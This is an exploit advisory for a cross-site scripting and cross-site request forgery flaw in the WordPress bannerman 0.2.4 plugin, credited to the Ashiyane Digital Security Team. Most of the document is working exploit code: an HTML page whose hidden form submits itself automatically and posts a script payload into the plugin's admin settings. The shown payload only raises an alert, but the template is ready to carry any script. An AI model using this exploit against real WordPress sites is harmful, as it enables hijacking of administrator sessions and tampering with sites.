######################
# Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org/plugins/bannerman/

# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip

# Date : 2014-06-27

# Tested on : Windows 7 / Mozilla Firefox
######################

# Location : http://localhost/wp-admin/options-general.php?page=bannerman

######################

Exploit Code:

<html>
<body>
<form name="post_form"  
action="http://localhost/wp-admin/options-general.php?page=bannerman"  
method="post">
<input type='hidden' name="bannerman_background"  
id="bannerman_background" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>

#####################

Discovered By : ACC3SS

#####################